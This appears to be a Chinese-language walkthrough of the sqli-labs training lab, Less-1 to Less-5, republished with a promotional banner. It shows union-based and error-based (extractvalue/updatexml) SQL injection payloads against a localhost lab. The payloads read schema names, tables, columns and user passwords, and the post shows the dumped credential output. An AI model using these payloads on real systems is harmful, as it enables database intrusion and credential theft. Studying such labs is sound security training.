SELECT * FROM users WHERE id=''1--'

 

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

http://localhost/sqli-labs/Less-1/?id=1 unnion select passdword from user where id='2'


Less-1:字符型SQL注入漏洞,直接注入:

1、判断注入点:
输入:http://localhost/sqli-labs/Less-1/?id=1' and 1=1 --+
执行的MySQL语句为:SELECT * FROM users WHERE id='1' and 1=1 -- 'LIMIT 0,1
2、查询列数:
order by 方法查询:
输入:http://localhost/sqli-labs/Less-1/?id=1' order by 3 --+
执行的MySQL语句为:SELECT * FROM users WHERE id='1' order by 3 -- ' LIMIT 0,1

输入:http://localhost/sqli-labs/Less-1/?id=1' order by 4--+
报错,说明表格为3列。
union方法查询:

输入:http://localhost/sqli-labs/Less-1/?id=1' union select null,null,null '
执行的MySQL语句为:SELECT * FROM users WHERE id='1' union select null,null,null '' LIMIT 0,1

http://localhost/sqli-labs/Less-1/?id=1' union select 1,2,3 '
执行的MySQL语句为:SELECT * FROM users WHERE id='1' union select 1,2,3'' LIMIT 0,1

http://localhost/sqli-labs/Less-1/?id=1' union select 1,2,3 and '1'=1'
执行的MySQL语句为:SELECT * FROM users WHERE id='1' union select 1,2,3 and '1'=1'' LIMIT 0,1

3、查询数据库信息
先介绍几个函数:
  (1)version():查看数据库版本
  (2)user():查看当前用户
  (3)database():查看使用的数据库
  (4) limit :limit子句来分批获取所有数据
  (5)group_concat():一次性获取数据库信息。

http://localhost/sqli-labs/Less-1/?id=1' and 1=2 union select null,user(),database() ' //使用id=1' and 1=2 或者id=-1出错爆版本
执行的MySQL语句为:SELECT * FROM users WHERE id='1' and 1=2 union select null,user(),database() '' LIMIT 0,1

查询数据库名信息的语句:
http://localhost/sqli-labs/Less-1/?id=1' and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

4、爆数据:
security:0x7365637572697479
user:0x7573657273
输入:http://localhost/sqli-labs/Less-1/?id=1' and 1=2 union select null,group_concat(column_name),null from information_schema.columns where table_name=0x7573657273 and '1' = '1


输入:http://localhost/sqli-labs/Less-1/?id=1' and 1=2 union select null,username,password from users --+


group_concat用法:
group_concat([DISTINCT] 要连接的字段 [Order BY ASC/DESC 排序字段] [Separator ‘分隔符’])
select id,group_concat(username separator" ; " ) from users; //group by id

5、查询所有数据库 information_schema -> schemata -> schema_name
SQL语句: select schema_name from information_schema.schemata;
http://127.0.0.1/sqli-labs/Less-1/?id=861' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

6、查询所有表(security)information_schema -> tables -> table_name table_schema
SQL语句查询数据表:
select group_concat(table_name) from information_schema.tables where table_schema="security";

可以用十六进制也可以直接用字符:
http://127.0.0.1/sqli-labs/Less-1/?id=861' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),3 --+

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema="security") ,database() --+

http://localhost/sqli-labs/less-1/?id=1' and 1=2 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema =database() ) --+

7、获取字段名:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x75736572),3 --+

限制获取security库,user表的字段
localhost//sqli-labs/less-1/?id=-1' and 1=1 union select 1,database(), (select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema ="security" ) --+

8、获取数据(显示users里面的用户和密码)
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(0x5c,username,0x5c,password) from users),3 --+

--------------------完成了------------------------------

总结:
表名:table_name;
字段名(列名):column_name
爆值:group_concat(username,0x3a,passdword)

ASCII:
0x3a(:) 0x5c(\)

练习第2次:
查询库:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,database(),(select group_concat(schema_name) from information_schema.schemata) --+
Your Login name:security
Your Password:information_schema,aaa,challenges,discuz,dvwa,fendo,jokeDB,mysql,performance_schema,security,test,user
查询表:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema ="security") --+
Your Login name:security
Your Password:emails,referers,uagents,users

查询列:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,database(),(select group_concat(column_name) from information_schema.columns where table_name ="users" and TABLE_SCHEMA = "security" ) --+
Your Login name:security
Your Password:id,username,password
综合:数据库:security 表有:emails,referers,uagents,users 数据列:id,username,password
查询数据:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,database(),(select group_concat(username,"||",password) from users ) --+
Your Login name:security
Your Password:Dumb||Dumb,Angelina||I-kill-you,Dummy||p@ssword,secure||crappy,stupid||stupidity,superman||genious,batman||mob!le,admin||admin,admin1||admin1,admin2||admin2,admin3||admin3,dhakkan||dumbo,admin4||admin4


less-2:
数字型SQL注入漏洞,直接注入:
http://localhost/sqli-labs/Less-2/?id=-1 and 1=1 union select 1,database(),(select group_concat(username,"||",password) from users) --+
Your Login name:security
Your Password:Dumb||Dumb,Angelina||I-kill-you,Dummy||p@ssword,secure||crappy,stupid||stupidity,superman||genious,batman||mob!le,admin||admin,admin1||admin1,admin2||admin2,admin3||admin3,dhakkan||dumbo,admin4||admin4

 


less-3:
SELECT * FROM users WHERE id=('1') and ('1'='2')
带括号的字符型SQL注入漏洞,直接注入:
http://localhost/sqli-labs/Less-3/?id=-1') union select 1,database(),(select group_concat(username,password) from users ) --+


less-4:
使用")闭合。
http://localhost/sqli-labs/Less-4/?id=-1") union select 1,database(),(select group_concat(username,"||",password) from users ) --+

less-5:
报错注入函数网站:http://www.cnblogs.com/Dleo/p/5493782.html
找注入点:
http://localhost/sqli-labs/Less-5/?id=1' and 1=2 --+
通过报错注入函数来显示:
http://localhost/sqli-labs/Less-5/?id=1' and (extractvalue(1,concat("||",(select database() ))) ) --+
报出数据:(通过调整limit中的第一个参数,来调整读取的数据行)
http://localhost/sqli-labs/Less-5/?id=1' and (extractvalue(1,concat("->>",(select concat(username,"||",password) from users limit 3,1 ))) ) --+

 

SQL命令行中:
select * from users where id=1 and (ExtractValue(1,concat("||",(select database() ))) );
显示:ERROR 1105 (HY000): XPATH syntax error: '||security'
ExtractValue,查询文档的函数
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串).
作用:从目标XML中返回包含所查询值的字符串
例如:select * from users where id=1 and (ExtractValue(2,concat("||",(select database() ))) );
注入方法:and extractvalue(1, concat(0x5c, (SQL语句)))

查database():
select * from users where id =1 and (ExtractValue(1,concat( '>',(select database())) ) );
查user():
select * from users where id =1 and (ExtractValue(id,concat( '>',(select user())) ) );
查version():
select * from users where id =1 and (ExtractValue(id,concat( '>',(select version())) ) );

Updatexml 查询:
用法:1=(updatexml(1,concat(">",(SQL语句)),1))
id = 1 and (updatexml(0x3a,concat(1,(select user())),1))

select * from users where id =1 and (updatexml(1,concat(">",(select version())),1 ));

select * from users where id =1 and (updatexml(1,concat(">",(select database())),1));

注意:当mysql版本>5.5.53时,无法利用exp()函数

 

 

 

 

 

 

 

 

 

 

 

 


扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄